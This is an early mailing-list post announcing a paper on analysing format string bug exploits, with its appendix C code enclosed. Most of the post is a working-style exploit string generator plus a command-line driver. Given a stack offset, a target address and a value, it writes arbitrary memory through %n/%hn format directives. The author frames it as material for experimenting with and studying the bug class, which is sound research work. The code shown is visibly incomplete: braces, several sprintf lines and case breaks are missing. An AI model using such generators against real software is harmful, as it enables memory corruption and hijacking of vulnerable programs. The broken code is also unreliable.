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Paper: Format String Bug Analysis

From: Andreas Thuemmel <a.thuemmel () WEB DE>
Date: Thu, 1 Mar 2001 08:53:18 +0100


I've written a little paper on the analysis of exploits based 
on format string bugs. The paper can be found at

Enclosed you find the example code given in the appendix of the
paper that can be used in order to experiment with format strings.


/* fmtstring.c 
 *  "Format String Bug" example code 
 *  by Andreas Thuemmel, November 2000  
 *  a.thuemmel () computer org

 * int gen_exploit_str(
 *   char *fmt, 
 *   int n, 
 *   void *mm, 
 *   unsigned int k, 
 *   int string_offset,
 *   int dollar_flag, 
 *   int bigendian, 
 *   int words
 * )
 * Create an exploit string in order to write an arbitrary
 * value to an almost arbitrary address in memory via a
 * "Format String Bug". In order for the string to be usable, it has
 * to be stored on the stack somewhere above the frame of the 
 * *printf function that reads the string. 
 * Arguments:
 *  fmt - pointer to a buffer that will hold the resulting string
 *        (the buffer has to be long enaough to hold the string!),
 *  n   - number of bytes to walk up the stack in order to find the 
 *        format string,
 *  mm  - memory address to overwrite,
 *  kk  - value to write.
 * Options:
 *  string_offset     - number of chars in _final_ format string that
 *                      preceed the exp.-string, e.g. for iterated *printfs
 *                      (set to 0 most of the times)  
 *  if dollar_flag != 0 then use "$" format statement to walk up
 *                      the stack 
 *  if bigendian != 0   then assume bigendian format (beware! untested) 
 *  if words != 0       then do 2 short int writes instead of 4 byte writes 
 * Assumption: sizeof(int)=4, sizeof(short int)=2, sizeof(int*)=4
 * Returns:
 *  -1 if the memory address (mm) is not writable,  
 *  length of the exploit string otherwise
 *  by Andreas Thuemmel, November 2000  
 *  a.thuemmel () computer org

#include <string.h>
#include <stdio.h>

int gen_exploit_str(char *fmt, int n, void *mm, unsigned int k, 
                    int string_offset, int dollar_flag, int bigendian, 
                    int words)
   int i, nn = n + string_offset;
   int plen = string_offset;     /* length of *printf's output string */
   int slen = 0;                 /* length of exploit string */
   int stepup;      /* # of bytes/4 to walk up the stack to find %n args */ 
   int inc,shift;   
   if (words)
      inc = 2, shift = 0x10000;
      inc = 1, shift = 0x100;
   /* Adjust nn to a multiple of 4, as we can only walk up
    * the stack in steps of at least 4 bytes. Pad the
    * string as necessary.
   if (nn%4>0) 
      for (i=0; i<nn%4; i++)
   stepup = nn/4;

   /* Write the "arguments" for %n at the head of the
    * string. We do 4 separate 'short int' writes via %hn. 
    * One for every byte of k. Thus mm, mm+1, mm+2, mm+3
    * are written to. None of them must contain a 0x00-byte. 
   for (i=0; i<4; i+=inc)
      unsigned int b0,b1,b2,b3, mem;
      if (bigendian)
         mem = (unsigned int)mm-i;
           mem = (unsigned int)mm+i;
      b0 = mem&0xff;
      b1 = (mem>>8)&0xff;
      b2 = (mem>>16)&0xff;
      b3 = (mem>>24)&0xff;
      if ( b0*b1*b2*b3 == 0 )
         return -1;
      if (bigendian)
         sprintf(fmt+slen,"    %c%c%c%c",b3,b2,b1,b0);
         sprintf(fmt+slen,"    %c%c%c%c",b0,b1,b2,b3);
      slen += 8;
      plen += 8;

   /* Write the actual %n format commands. In front 
    * of every "%n" walk up the stack stepup*4 bytes
    * (by "$"-jumps if dollar_flag!=0, by stepup "%x"s otherwise)
    * in order to find our string that contains the memory 
    * addresses to write to and adjust the length of
    * output string appropriately via length (".") 
    * formated hexadecimal integer writes ("x"). 
   if (!dollar_flag)
      for (i=0; i<stepup; i++)
         slen += 4;
         plen += 8; 
   for (i=0; i<4; i+=inc)
      int p = (k%shift - plen%shift); 
      if (p<0) 
         p += shift; 
      if (p<8) 
         p += shift; 
      plen += p;
      k /= shift;
      if (dollar_flag) 
         stepup += 2;
      } else {
      slen = strlen(fmt);
   return slen;

#include <unistd.h>

int main(int argc, char **argv)
   char string[4096];  /* yes, I know it's lame but it's late.... */
   int n = 0, m = 0, k = 0, off = 0, dollar = 0, big = 0, words = 0;
   char ch;
   extern int optind, opterr;
   extern char *optarg;

   while ((ch = getopt(argc, argv, "hdbwn:m:k:o:")) != -1)
       case 'n':
           n = atoi(optarg);
       case 'm':
           sscanf(optarg,"%x",&m);   /* I know... */
       case 'k':
       case 'o':
           n = atoi(optarg);
       case 'd':
           dollar = 1;
       case 'b':
           big = 1;
       case 'w':
           words = 1;
       case 'h':
           puts(" -n stack walk up bytes (required)"); 
           puts(" -m memory address to overwrite in hex (required)"); 
           puts(" -k value to write in hex (required)");
           puts(" -o offset"); 
           puts(" -d use dollar flag"); 
           puts(" -b big endian target architecture"); 
           puts(" -w use word writes instead of byte writes");

   if (gen_exploit_str(string,n,(void *)m,k,off,dollar,big,words) != -1)
   else {
      puts("Address contains a 0x00 byte.");
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